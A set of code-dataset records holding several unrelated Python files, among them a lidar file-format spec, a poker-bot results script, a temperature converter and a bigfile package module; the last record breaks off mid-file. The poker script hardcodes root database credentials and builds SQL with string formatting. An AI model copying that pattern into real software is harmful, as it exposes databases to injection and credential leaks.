batch_fs2s.to(device)\n batch_fn1s = batch_fn1s.to(device)\n batch_fn2s = batch_fn2s.to(device)\n batch_fr1s = batch_fr1s.to(device)\n batch_fr2s = batch_fr2s.to(device)\n batch_fi1s = batch_fi1s.to(device)\n batch_tgt = batch_tgt.to(device)\n prob = model(batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s)\n symbols = prob.topk(1)[1].squeeze(1)\n aspect_all_ys_.extend(symbols.tolist())\n aspect_all_ys.extend(batch_tgt.tolist())\n aspect_all_ys_avg.extend(batch_avg)\n aspect_ids.extend(batch_ids)\nr = accuracy_score(aspect_all_ys, aspect_all_ys_)\nm = mean_squared_error(aspect_all_ys, aspect_all_ys_)\nprint()\nprint('\\t accuracy %.4f' % (r))\nprint('\\t mse %.4f' % (m))\ndecision_accuracy = 0\nfor ys_, ys in zip(aspect_all_ys_, aspect_all_ys_avg):\n if (ys_+1 > 3 and ys > 3.5) or (ys_+1 <= 3 and ys <= 3.5):\n decision_accuracy += 1\nprint('\\t decision accuracy', decision_accuracy/len(aspect_all_ys_))\nprint(aspect_all_ys, aspect_all_ys_, aspect_all_ys_avg)","sub_path":"Score Prediction/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431418651","text":"'''\n.mpl file format for SigmaMPL2015R2.3 Manual, Data file version 5\n'''\n# import\nimport numpy as np\n\n\n# supp function\ndef size2eind_func(bytesizedic):\n '''\n converts bytesizedic to byteinddic. end index of each data key\n '''\n vals, keys = list(bytesizedic.values()), list(bytesizedic.keys())\n vals = np.cumsum(vals)\n return dict(zip(keys, vals))\n\ndef size2sind_func(sinddic):\n '''\n converts bytesizedic to byteinddic. start index of each data key\n '''\n vals, keys = list(sinddic.values()), list(sinddic.keys())\n vals.pop()\n vals.insert(0, 0)\n return dict(zip(keys, vals))\n\n\n# defining data\ntime_keylst = [\n 'year', # to be handled seperately this does not follow\n 'month', # exactly with the manual it is accomodated for\n 'day', # pandas\n 'hour', #\n 'minute', #\n 'second', #\n]\nchannel_keylst = [\n 'Channel #1 Data',\n 'Channel #2 Data',\n]\nwanted_keylst = [\n # 'Unit Number',\n # 'Version Format',\n 'year', # to be handled seperately, this does not follow\n 'month', # exactly with the manual, it is accomodated for\n 'day', # pandas\n 'hour', #\n 'minute', #\n 'second', #\n 'Shots Sum',\n 'Trigger Frequency', # for performance check\n 'Energy Monitor', # [nJ]\n 'Temp #0', # Detector Temperature\n 'Temp #1', # unknown\n 'Temp #2', # Telescope Temperature\n 'Temp #3', # Laser temperature\n 'Temp #4', # unknown\n 'Background Average',\n 'Background Std Dev',\n # 'Number Channels', # assumed to always be 2\n 'Number Bins',\n 'Bin Time', # half the bin size in temporal\n 'Range Calibration', # mainly zero, check for every new unit\n 'Number Data Bins',\n 'Scan Scenario Flag', # check angle and remove\n 'Number of Background Bins',\n 'Azimuth Angle',\n 'Elevation Angle',\n # 'Compass Degrees',\n # 'Lidar Site',\n # 'Wavelength',\n # 'GPS Latitude',\n # 'GPS Longitude',\n # 'GPS Altitude',\n 'A/D Data Bad flag', # for performance check, 0 is good, 1 is bad\n # 'DataFileVersion', # version 5\n 'Background Average 2',\n 'Background Std Dev 2',\n 'McsMode',\n 'First data bin', # noted to be zero, might be redundant\n 'System Type',\n 'Sync Pulses Seen Per Second', # for performance, this values changes\n 'First Background Bin',\n # 'Header Size', # static 163,size of data before the channels\n 'Weather Station Used',\n 'Weather Station: Inside Temperature',\n 'Weather Station: Outside Temperature',\n 'Weather Station: Inside Humidity',\n 'Weather Station: Outside Humidity',\n 'Weather Station: Dew Point',\n 'Weather Station: Wind Speed',\n 'Weather Station: Wind Direction',\n 'Weather Station: Barometric Pressure',\n 'Weather Station: Rain Rate',\n 'Channel #1 Data', # [MHz]\n 'Channel #2 Data', # [MHz]\n]\ndtype_dic = {\n 'Unit Number':np.uint16,\n 'Version Format':np.uint16,\n 'year':np.uint16,\n 'month':np.uint16,\n 'day':np.uint16,\n 'hour':np.uint16,\n 'minute':np.uint16,\n 'second':np.uint16,\n 'Shots Sum':np.uint32,\n 'Trigger Frequency':np.int32,\n 'Energy Monitor':np.uint32,\n 'Temp #0':np.uint32,\n 'Temp #1':np.uint32,\n 'Temp #2':np.uint32,\n 'Temp #3':np.uint32,\n 'Temp #4':np.uint32,\n 'Background Average':np.float32,\n 'Background Std Dev':np.float32,\n 'Number Channels':np.uint16,\n 'Number Bins':np.uint32,\n 'Bin Time':np.float32,\n 'Range Calibration':np.float32,\n 'Number Data Bins':np.uint16,\n 'Scan Scenario Flag':np.uint16,\n 'Number of Background Bins':np.uint16,\n 'Azimuth Angle':np.float32,\n 'Elevation Angle':np.float32,\n 'Compass Degrees':np.float32,\n 'Lidar Site':np.char, # this is not correct\n 'Wavelength':np.uint16,\n 'GPS Latitude':np.float32,\n 'GPS Longitude':np.float32,\n 'GPS Altitude':np.float32,\n 'A/D Data Bad flag':np.int8,\n 'DataFileVersion':np.int8,\n 'Background Average 2':np.float32,\n 'Background Std Dev 2':np.float32,\n 'McsMode':np.int8,\n 'First data bin':np.uint16,\n 'System Type':np.int8,\n 'Sync Pulses Seen Per Second':np.uint16,\n 'First Background Bin':np.uint16,\n 'Header Size':np.uint16,\n 'Weather Station Used':np.int8,\n 'Weather Station: Inside Temperature':np.float32,\n 'Weather Station: Outside Temperature':np.float32,\n 'Weather Station: Inside Humidity':np.float32,\n 'Weather Station: Outside Humidity':np.float32,\n 'Weather Station: Dew Point':np.float32,\n 'Weather Station: Wind Speed':np.float32,\n 'Weather Station: Wind Direction':np.int16,\n 'Weather Station: Barometric Pressure':np.float32,\n 'Weather Station: Rain Rate':np.float32,\n 'Channel #1 Data':np.float32,\n 'Channel #2 Data':np.float32,\n}\n## config dependent\nbytesize_dic = {\n 'Unit Number':2,\n 'Version Format':2,\n 'year':2,\n 'month':2,\n 'day':2,\n 'hour':2,\n 'minute':2,\n 'second':2,\n 'Shots Sum':4,\n 'Trigger Frequency':4,\n 'Energy Monitor':4,\n 'Temp #0':4,\n 'Temp #1':4,\n 'Temp #2':4,\n 'Temp #3':4,\n 'Temp #4':4,\n 'Background Average':4,\n 'Background Std Dev':4,\n 'Number Channels':2,\n 'Number Bins':4,\n 'Bin Time':4,\n 'Range Calibration':4,\n 'Number Data Bins':2,\n 'Scan Scenario Flag':2,\n 'Number of Background Bins':2,\n 'Azimuth Angle':4,\n 'Elevation Angle':4,\n 'Compass Degrees':4,\n 'Lidar Site':6,\n 'Wavelength':2,\n 'GPS Latitude':4,\n 'GPS Longitude':4,\n 'GPS Altitude':4,\n 'A/D Data Bad flag':1,\n 'DataFileVersion':1,\n 'Background Average 2':4,\n 'Background Std Dev 2':4,\n 'McsMode':1,\n 'First data bin':2,\n 'System Type':1,\n 'Sync Pulses Seen Per Second':2,\n 'First Background Bin':2,\n 'Header Size':2,\n 'Weather Station Used':1,\n 'Weather Station: Inside Temperature':4,\n 'Weather Station: Outside Temperature':4,\n 'Weather Station: Inside Humidity':4,\n 'Weather Station: Outside Humidity':4,\n 'Weather Station: Dew Point':4,\n 'Weather Station: Wind Speed':4,\n 'Weather Station: Wind Direction':2,\n 'Weather Station: Barometric Pressure':4,\n 'Weather Station: Rain Rate':4,\n 'Channel #1 Data':0, # to be filled in by reader\n 'Channel #2 Data':0 # 1000 -> 30m binsize, 2000 -> 15m binsize\n}\n\n\nbyteeind_dic = size2eind_func(bytesize_dic)\nbytesind_dic = size2sind_func(byteeind_dic)\n\n\n# for import\nimport_dic = {\n 'time_key':'Timestamp',\n 'range_key':'Range',\n 'mask_key':'Channel Data Mask',\n 'pad_key':'Pad',\n 'headersize':163,\n 'bintimefactor':0.5,\n 'energyfactor':1e-3,\n 'channelbytenum':4,\n\n 'time_keylst':time_keylst,\n 'channel_keylst':channel_keylst,\n 'wanted_keylst':wanted_keylst,\n\n 'dtype_dic':dtype_dic,\n 'bytesize_dic':bytesize_dic,\n 'bytesind_dic':bytesind_dic,\n 'byteeind_dic':byteeind_dic,\n}\n\n# testing\nif __name__ == '__main__':\n print(byteeind_dic)\n","sub_path":"mpl_reader/smmpl_fmt.py","file_name":"smmpl_fmt.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"207809900","text":"import pymysql\r\nimport pandas as pd\r\nimport json\r\nfrom collections import defaultdict\r\n\r\ndef main():\r\n names = [\"TEST_NUDT_IA\", \"TEST_NUDT_THU\", \"TEST_IA_THU\", \"TEST_NUDT_ICT\", \"Test_IA_ICT\", \"TEST_THU_ICT\"]\r\n for name in names:\r\n Mysql().lookup(name, False)\r\n # name = \"NewStack_MoreAction vs nudt\"\r\n # name = \"Hit_6p_test\"\r\n # name = \"NewStack_argmax vs nudt\"\r\n # Mysql().lookup(name) \r\n # name = \"Test6p\"\r\n # Mysql().lookup(name)\r\n # Mysql().battle_history(name)\r\n # Mysql().user_battle_history(\"FengYan\", \"OpenStack\")\r\n\r\nclass Mysql:\r\n\r\n def __init__(self):\r\n self.content = pymysql.Connect(\r\n host=\"172.18.40.65\", # mysql的主机ip\r\n port=3306, # 端口\r\n user=\"root\", # 用户名\r\n passwd=\"root\", # 数据库密码\r\n db=\"poker\", # 数据库名\r\n charset='utf8', # 字符集\r\n )\r\n self.cursor = self.content.cursor()\r\n\r\n def lookup(self, battle_name, save_file=True):\r\n game_sql = 'select bot_list from batch_ai_validate where batch_name like \"{}%\"'.format(battle_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n bots = result[0][0].split(',')\r\n\r\n table = pd.DataFrame(columns=['AI名字', '总局数', '累积收益筹码', '场均收益筹码', '0.95置信区间'])\r\n\r\n for bot in bots:\r\n game_sql = (\r\n 'SELECT count(*) AS 总局数, sum( win_money ) AS 总赢钱, Round( sum( win_money ) / count(*) , 2 ) AS \"mbb/h\", Round( STD( win_money ) * 10, 2 ) AS 标准差, '\r\n 'Round( 1.96 * STD( win_money )/ POWER( count(*), 1 / 2 ) , 2 ) AS \"0.95置信区间范围\" FROM player ' \r\n 'WHERE room_id IN (select room_id from validate_room_mapping where batch_name like \"{}%\") and name = \"{}\"'\r\n ).format(battle_name, bot)\r\n self.cursor.execute(game_sql)\r\n self.cursor.connection.commit()\r\n result = self.cursor.fetchall()[0]\r\n table.loc[table.shape[0]] = [bot, result[0], result[1], result[2], result[4]]\r\n print(table)\r\n\r\n if save_file:\r\n writer = pd.ExcelWriter('../docs/record/{}_stat.xlsx'.format(battle_name)) \r\n table.to_excel(writer,float_format='%.5f')\r\n writer.save()\r\n\r\n def transpose(self, action_history):\r\n def f(x):\r\n if x == \"call\":\r\n return \"c\"\r\n if x == \"check\":\r\n return \"c\"\r\n if x == \"fold\":\r\n return \"f\"\r\n return x\r\n game_all = []\r\n for one_round in action_history:\r\n round_all = []\r\n for one_action in one_round:\r\n action = str(one_action[\"position\"]) + \":\" + f(str(one_action[\"action\"]))\r\n round_all.append(action)\r\n round_all = ','.join(round_all)\r\n game_all.append(round_all)\r\n game_all = '/'.join(game_all)\r\n return game_all\r\n\r\n def battle_history(self, battle_name, save_file=True):\r\n history = {}\r\n game_sql = 'SELECT * FROM game WHERE room_id IN (select room_id from validate_room_mapping where batch_name like \"{}%\") )'.format(battle_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, public_card, action_history, battle_time, room_id = row[:5]\r\n history[game_id] = dict(\r\n public_card=public_card, \r\n action_history=self.transpose(json.loads(action_history)),\r\n battle_time=battle_time.strftime('%Y-%m-%d %H:%M:%S' ),\r\n players={}\r\n )\r\n \r\n game_sql = 'SELECT game_id, position, win_money, private_card, name FROM player WHERE (room_id IN (select room_id from validate_room_mapping where batch_name like \"{}%\") or (room_id >= 800000 and room_id <= 800100))'.format(battle_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, position, win_money, private_card, name = row[:]\r\n history[game_id][\"players\"][int(position)] = dict(\r\n win_money=float(win_money),\r\n private_card=private_card,\r\n name=name \r\n )\r\n if save_file:\r\n with open(\"../docs/record/{}_history.json\".format(battle_name), \"w\") as f:\r\n json.dump(history, f, indent=4, ensure_ascii=False)\r\n\r\n def user_battle_history(self, user_name, bot_name, save_file=True):\r\n history = {}\r\n game_sql = 'SELECT * FROM game WHERE room_id IN (SELECT room_id FROM room WHERE create_user_name = \"{}\" AND boot_list = \"{}\" ) Order By time'.format(user_name, bot_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, public_card, action_history, battle_time, room_id = row[:5]\r\n history[game_id] = dict(\r\n public_card=public_card, \r\n action_history=self.transpose(json.loads(action_history)),\r\n battle_time=battle_time.strftime('%Y-%m-%d %H:%M:%S' ),\r\n players={}\r\n )\r\n\r\n game_sql = 'SELECT game_id, position, win_money, private_card, name FROM player WHERE room_id IN (SELECT room_id FROM room WHERE create_user_name = \"{}\" AND boot_list = \"{}\" )'.format(user_name, bot_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, position, win_money, private_card, name = row[:]\r\n history[game_id][\"players\"][int(position)] = dict(\r\n win_money=float(win_money),\r\n private_card=private_card,\r\n name=name \r\n )\r\n error_game_id = []\r\n for game_id, value in history.items():\r\n if value[\"players\"][0][\"name\"] != bot_name and value[\"players\"][1][\"name\"] != bot_name:\r\n error_game_id.append(game_id)\r\n for game_id in error_game_id:\r\n del history[game_id]\r\n if save_file:\r\n with open(\"../docs/record/{}_{}_history.json\".format(user_name, bot_name), \"w\") as f:\r\n json.dump(history, f, indent=4, ensure_ascii=False)\r\n\r\n table = pd.DataFrame(columns=['玩家名', '玩家位置', '玩家手牌', 'OpenStack手牌', '公共牌', '玩家获胜筹码', '动作序列', '对打时间'])\r\n\r\n count, total = 0, 0\r\n for game_id, value in history.items():\r\n line = []\r\n line.append(user_name)\r\n if value[\"players\"][0][\"name\"] == bot_name:\r\n position = 1\r\n else:\r\n position = 0\r\n line.append(position)\r\n line.append(value[\"players\"][position][\"private_card\"])\r\n line.append(value[\"players\"][1 - position][\"private_card\"])\r\n line.append(value[\"public_card\"])\r\n line.append(value[\"players\"][position][\"win_money\"])\r\n line.append(value[\"action_history\"])\r\n line.append(value[\"battle_time\"])\r\n table.loc[table.shape[0]] = line\r\n count += 1\r\n total += value[\"players\"][position][\"win_money\"]\r\n writer = pd.ExcelWriter('../docs/record/{}_{}_stat.xlsx'.format(user_name, bot_name)) \r\n table.to_excel(writer,float_format='%.5f')\r\n writer.save()\r\n print(count, total, total / count)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"scripts/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112907694","text":"fahrenheitMeltDegrees = 32.0\r\nfahrenheitBoilDegrees = 212.0\r\n\r\ncelsiusMeltDegrees = 0.0\r\ncelsiusBoilDegrees = 100.0\r\n\r\n# a)\r\ncelsiusConvert = float(input(\"Convert Celsius to Fahrenheit: \"))\r\ncelsiusResult = celsiusConvert * 1.8 + fahrenheitMeltDegrees\r\nprint(\"Celsius degrees converted to Fahrenheit: \" + str(round(celsiusResult, 2)))\r\n\r\nprint()\r\n\r\n# b)\r\nfahrenheitConvert = float(input(\"Convert Fahrenheit to Celsius: \"))\r\nfahrenheitResult = (fahrenheitConvert - fahrenheitMeltDegrees) / 1.8\r\nprint(\"Fahrenheit degrees converted to Celsius: \" + str(round(fahrenheitResult, 2)))","sub_path":"rudi_rutanen-python_harjoitus-2.py","file_name":"rudi_rutanen-python_harjoitus-2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31727812","text":"from .version import __version__\n\nfrom .pyxbigfile import BigFileError, BigFileClosedError, BigBlockClosedError\nfrom .pyxbigfile import BigBlock as BigBlockBase\nfrom .pyxbigfile import BigFile as BigFileLowLevel\nfrom .pyxbigfile import set_buffer_size\nfrom . import bigfilempi\n\nimport os\nimport numpy\n\ntry:\n basestring # attempt to evaluate basestring\n def isstr(s):\n return isinstance(s, basestring)\nexcept NameError:\n def isstr(s):\n return isinstance(s, str)\n\ndef isstrlist(s):\n if not isinstance(s, list):\n return False\n return all([ isstr(ss) for ss in s])\n\nclass BigBlock(BigBlockBase):\n def flush(self):\n self._flush()\n def close(self):\n self._close()\n\nclass BigFileBase(BigFileLowLevel):\n def __init__(self, filename, create=False):\n BigFileLowLevel.__init__(self, filename, create)\n self.blocks = []\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, tb):\n self.close()\n\n def __contains__(self, key):\n return key in self.blocks\n\n def __iter__(self):\n return iter(self.blocks)\n\n def __getitem__(self, key):\n if key.endswith('/'):\n return self.subfile(key)\n\n return self.open(key)\n\n\nclass BigFile(BigFileBase):\n\n def __init__(self, filename, create=False):\n BigFileBase.__init__(self, filename, create)\n self.refresh()\n\n def open(self, blockname):\n block = BigBlock()\n block.open(self, blockname)\n return block\n\n def create(self, blockname, dtype=None, size=None, Nfile=1):\n block = BigBlock()\n block.create(self, blockname, dtype, size, Nfile)\n self.refresh()\n return block\n\n def subfile(self, key):\n return BigFile(os.path.join(self.basename, key))\n\n def refresh(self):\n \"\"\" Refresh the list of blocks to the disk.\"\"\"\n self.blocks = self.list_blocks()\n\nclass BigBlockMPI(BigBlock):\n def __init__(self, comm):\n self.comm = comm\n BigBlock.__init__(self)\n\n def create(self, f, blockname, dtype=None, size=None, Nfile=1):\n if self.comm.rank == 0:\n super(BigBlockMPI, self).create(f, blockname, dtype, size, Nfile)\n super(BigBlockMPI, self).close()\n self.comm.barrier()\n self.open(f, blockname)\n\n def close(self):\n self._MPI_close()\n\n def flush(self):\n self._MPI_flush()\n\nclass BigFileMPI(BigFileBase):\n\n def __init__(self, comm, filename, create=False):\n self.comm = comm\n if self.comm.rank == 0:\n BigFileBase.__init__(self, filename, create)\n self.comm.barrier()\n if self.comm.rank != 0:\n self.comm.barrier()\n BigFileBase.__init__(self, filename, create=False)\n self.refresh()\n\n def refresh(self):\n \"\"\" Refresh the list of blocks to the disk, collectively \"\"\"\n if self.comm.rank == 0:\n self.blocks = self.list_blocks()\n else:\n self.blocks = None\n self.blocks = self.comm.bcast(self.blocks)\n\n def open(self, blockname):\n block = BigBlockMPI(self.comm)\n block.open(self, blockname)\n return block\n\n def subfile(self, key):\n return BigFileMPI(self.comm, os.path.join(self.basename, key))\n\n def create(self, blockname, dtype=None, size=None, Nfile=1):\n block = BigBlockMPI(self.comm)\n block.create(self, blockname, dtype, size, Nfile)\n self.refresh()\n return block\n\n def create_from_array(self, blockname, array, Nfile=1):\n size = self.comm.allreduce(len(array))\n offset = sum(self.comm.allgather(len(array))[:self.comm.rank])\n dtype = numpy.dtype((array.dtype, array.shape[1:]))\n with self.create(blockname, dtype, size, Nfile) as b:\n b.write(offset, array)\n return self.open(blockname)\n\nclass BigData:\n \"\"\" Accessing read-only subset of blocks from a bigfile.\n \n Parameters\n ----------\n file : BigFile\n\n blocks : list or None\n a list of blocks to use. If None is given, all blocks are used.\n\n \"\"\"\n def __init__(self, file, blocks=None):\n if blocks is None:\n blocks = file.blocks\n\n self.blocknames = blocks\n self.blocks = dict([\n (block, file[block]) for block in self.blocknames])\n\n self.file = file\n dtype = []\n size = None\n for block in self.blocknames:\n bb = self.blocks[block]\n dtype.append((block, bb.dtype))\n if size is None: size = bb.size\n elif bb.size != size:\n raise BigFileError('Dataset length is inconsistent on %s' %block)\n\n self.size = size\n self.dtype = numpy.dtype(dtype)\n self.ndim = 1\n self.shape = (size, )\n\n def __getitem__(self, sl):\n if isinstance(sl, tuple):\n if len(sl) == 2:\n if isstr(sl[1]) or isstrlist(sl[1]):\n # sl[0] shall be column name\n sl = (sl[1], sl[0])\n col, sl = sl\n return self[col][sl]\n if len(sl) == 1:\n # Python 3? (a,) is sent in.\n return self[sl[0]]\n\n if isinstance(sl, slice):\n start, end, stop = sl.indices(self.size)\n assert stop == 1\n result = numpy.empty(end - start, dtype=self.dtype)\n for block in self.blocknames:\n result[block][:] = self.blocks[block][sl]\n return result\n elif sl is Ellipsis:\n return self[:]\n elif isstr(sl):\n return self.blocks[sl]\n elif isstrlist(sl):\n assert all([(col in self.blocks) for col in sl])\n return BigData(self.file, sl)\n elif numpy.isscalar(sl):\n sl = slice(sl, sl + 1)\n return self[sl][0]\n else:\n raise TypeError('Expecting a slice or a scalar, got a `%s`' %\n str(type(sl)))\n\n\nfrom numpy.testing import Tester\ntest = Tester().test\nbench = Tester().bench\n","sub_path":"bigfile/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"398404948","text":"def createCouple(aa):\n couples=[]\n for x in range(len(aa)):\n for i in range (len(aa)):\n c=aa[x]+aa[i]\n if c[::-1] not in couples:\n couples.append(c)\n return couples\n\ndef collectScores(matrix,aminoacid):\n lines=[]\n for line in matrix:\n line=line.rstrip()\n line=line.split()\n lines.append(line)\n x=20\n scores=[]\n for n in range(len(aminoacid)):\n columns=[]\n for j in range(x):\n columns.append(lines[j][n])\n x-=1\n scores.extend(columns)\n del lines[0]\n return scores\n\ndef createDictionary(matrix,aminoacid):\n coupleList=createCouple(aminoacid)\n scores=collectScores(matrix,aminoacid)\n dictionary={}\n i=0\n for couple in coupleList:\n dictionary[couple]=scores[i]\n i+=1\n print (\"VV\",dictionary['VV'])\n return dictionary\n\nmatrix=open(\"./PAM250.txt\",\"r\")\naminoacid=\"ARNDCQEGHILKMFPSTWYV\"\ncreateDictionary(matrix,aminoacid)\n","sub_path":"data/exercises/simmetric_matrix.py","file_name":"simmetric_matrix.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53943270","text":"#-*- coding: UTF-8 -*-\nfrom __future__ import division, print_function, absolute_import, unicode_literals\n\nimport numpy as np\nimport data_io_cognition as io\nimport cost_time as ct\nimport fits_cognition as fits\nfrom fits_cognition import Fitter\nimport utils\nimport matplotlib as mt\nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors as mt_colors\nimport matplotlib.gridspec as gridspec\nimport os, re, pickle, warnings, json, logging, copy, scipy.integrate, itertools, ete3, sys\nfrom sklearn import cluster\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy import stats\ntry:\n\tfrom diptest.diptest import dip\nexcept:\n\tfrom utils import dip\n\ndef default_tree_layout(node):\n\t\"\"\"\n\tdefault_tree_layout(node)\n\t\n\tTakes an ete3.TreeNode instance and sets its default style adding the\n\tappropriate TextFaces\n\t\n\t\"\"\"\n\tstyle = ete3.NodeStyle(vt_line_width=3,hz_line_width=3,size=0)\n\tif node.is_leaf():\n\t\tportions = node.name.split('_')\n\t\texperiment = None\n\t\tsubject = None\n\t\tsession = None\n\t\tname_alias = []\n\t\tif not portions[0] in ['subj','ses']:\n\t\t\tstart_ind = 1\n\t\t\texperiment = portions[0]\n\t\telse:\n\t\t\tstart_ind = 0\n\t\tfor key,val in zip(portions[start_ind::2],portions[start_ind+1::2]):\n\t\t\tif key=='subj':\n\t\t\t\tsubject = val\n\t\t\telif key=='ses':\n\t\t\t\tsession = val\n\t\tif not experiment is None:\n\t\t\tbgcolor = {'2AFC':'#FF0000','Auditivo':'#008000','Luminancia':'#0000FF'}[experiment]\n\t\t\tfgcolor = {'2AFC':'#000000','Auditivo':'#000000','Luminancia':'#000000'}[experiment]\n\t\telse:\n\t\t\tbgcolor = {'1':'#FF0000','2':'#008000','3':'#0000FF'}[session]\n\t\t\tfgcolor = {'1':'#000000','2':'#000000','3':'#000000'}[session]\n\t\tif experiment:\n\t\t\tname_alias.append({'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}[experiment])\n\t\tif subject:\n\t\t\tname_alias.append('Subj {0}'.format(subject))\n\t\tif session:\n\t\t\tname_alias.append('Ses {0}'.format(session))\n\t\tname_alias = ' '.join(name_alias)\n\t\tstyle['vt_line_color'] = bgcolor\n\t\tstyle['hz_line_color'] = bgcolor\n\t\tstyle['size'] = 3\n\t\tstyle['fgcolor'] = bgcolor\n\t\tface = ete3.TextFace(name_alias,fgcolor=fgcolor)\n\t\t#~ face.rotation = -15\n\t\tnode.add_face(face, column=0, position=\"aligned\")\n\telse:\n\t\tchild_leaf_color = None\n\t\tequal_leaf_types = True\n\t\tfor child_leaf in (n for n in node.iter_descendants(\"postorder\") if n.is_leaf()):\n\t\t\tportions = child_leaf.name.split('_')\n\t\t\ttry:\n\t\t\t\tbgcolor = {'2AFC':'#FF0000','Auditivo':'#008000','Luminancia':'#0000FF'}[portions[0]]\n\t\t\texcept:\n\t\t\t\tbgcolor = {'1':'#FF0000','2':'#008000','3':'#0000FF'}[portions[-1]]\n\t\t\tif child_leaf_color is None:\n\t\t\t\tchild_leaf_color = bgcolor\n\t\t\telif child_leaf_color!=bgcolor:\n\t\t\t\tequal_leaf_types = False\n\t\t\t\tbreak\n\t\tif equal_leaf_types:\n\t\t\tstyle['vt_line_color'] = child_leaf_color\n\t\t\tstyle['hz_line_color'] = child_leaf_color\n\tnode.set_style(style)\n\ndef default_tree_style(mode='r',title=None):\n\t\"\"\"\n\tdefault_tree_style(mode='r')\n\t\n\tmode can be 'r' or 'c'. Returns an ete3.TreeStyle instance with a\n\trectangular or circular display depending on the supplied mode\n\t\n\t\"\"\"\n\ttree_style = ete3.TreeStyle()\n\ttree_style.layout_fn = default_tree_layout\n\ttree_style.show_leaf_name = False\n\ttree_style.show_scale = False\n\tif not title is None:\n\t\ttree_style.title.add_face(ete3.TextFace(title, fsize=18), column=0)\n\tif mode=='r':\n\t\ttree_style.rotation = 90\n\t\ttree_style.branch_vertical_margin = 10\n\telse:\n\t\ttree_style.mode = 'c'\n\t\ttree_style.arc_start = 0 # 0 degrees = 3 o'clock\n\t\ttree_style.arc_span = 180\n\treturn tree_style\n\nclass Analyzer():\n\tdef __init__(self,method = 'full_confidence', optimizer = 'cma', suffix = '',\n\t\t\t\tcmap_meth='log_odds', fits_path='fits_cognition/',\n\t\t\t\toverride=False,n_clusters=2, affinity='euclidean',\n\t\t\t\tlinkage='ward', pooling_func=np.nanmean, connectivity=None):\n\t\t\"\"\"\n\t\tAnalyzer(method = 'full_confidence', optimizer = 'cma', suffix = '',\n\t\t\t\tcmap_meth='log_odds', fits_path='fits_cognition/',\n\t\t\t\toverride=False,n_clusters=2, affinity='euclidean',\n\t\t\t\tlinkage='ward', pooling_func=np.nanmean, connectivity=None)\n\t\t\n\t\tThis Class implements an interface between the\n\t\tdata_io_cognition.SubjectSession and the fits_cognition.Fitter\n\t\tthat constructs a summary of relevant statistics and features\n\t\tof the experimental data and theoretical predictions, and can\n\t\tthen perform relevant analyces and graphics from them.\n\t\t\n\t\tThe main analysis is the hierarchical clustering of the fitted\n\t\tparameters, which is performed with the scikit learn (sklearn)\n\t\tpackage's AgglomerativeClustering class. Thus, when constructing\n\t\tthe Analyzer, many input parameters are simply parameters used\n\t\tfor the creation of an AgglomerativeClustering instance.\n\t\t\n\t\tInput:\n\t\t\tmethod: Fitter instance's method.\n\t\t\toptimizer: Fitter instance's optimizer.\n\t\t\tsuffix: Fitter instance's suffix.\n\t\t\tcmap_meth: Fitter intance's high_confidence_mapping_method.\n\t\t\t\n\t\t\tThe four parameters listed above are used to determine the\n\t\t\tFitter files that should be loaded to get the relevant\n\t\t\tstatistics.\n\t\t\t\n\t\t\toverride: Bool by default False. The construction of the\n\t\t\t\texperimental and theoretical statistics takes a lot of\n\t\t\t\ttime. To improve succesive runtimes, the Analyzer, will\n\t\t\t\tattempt to load the summary statistics from the file\n\t\t\t\t'summary_{method}_{optimizer}_{cmapmeth}{suffix}.pkl',\n\t\t\t\tand if it does not exist, it will perform the\n\t\t\t\tcomputations and then save the summaries to the above\n\t\t\t\tmentioned file. If the override parameter is True, the\n\t\t\t\tsummary statistics are not loaded from the file,\n\t\t\t\tthey are computed and the contents of\n\t\t\t\t'summary_{method}_{optimizer}_{cmapmeth}{suffix}.pkl'\n\t\t\t\tare overriden with the currently computed statistics.\n\t\t\t\n\t\t\tThe following parameters are used to construct the \n\t\t\tsklearn.cluster.AgglomerativeClustering instance. Refer to\n\t\t\tthe scikit learn documentation for a detailed description\n\t\t\tof each of these parameters:\n\t\t\tn_clusters: Int. Default 2\n\t\t\taffinity: Str. Default 'euclidean'\n\t\t\tlinkage: Str. Default 'ward'\n\t\t\tpooling_func: Callable. Default numpy.nanmean\n\t\t\tconnectivity: Optional array-like or callable. Default None.\n\t\t\t\n\t\t\tWe will only mention that the pooling_func is also used to\n\t\t\tpool together the parameters when applying merges in the\n\t\t\tscatter_parameters, controlled_scatter and cluster methods.\n\t\t\tFurthermore, the affinity and linkage are used to compute\n\t\t\tthe cluster span.\n\t\t\n\t\t\"\"\"\n\t\tself.method = method\n\t\tself.optimizer = optimizer\n\t\tself.suffix = suffix\n\t\tself.cmap_meth = cmap_meth\n\t\tself.fits_path = fits_path\n\t\tself.get_summary(override=override)\n\t\tself.init_clusterer(n_clusters=n_clusters, affinity=affinity,\\\n\t\t\t\tlinkage=linkage, pooling_func=pooling_func, connectivity=connectivity)\n\t\n\tdef init_clusterer(self,n_clusters=2, 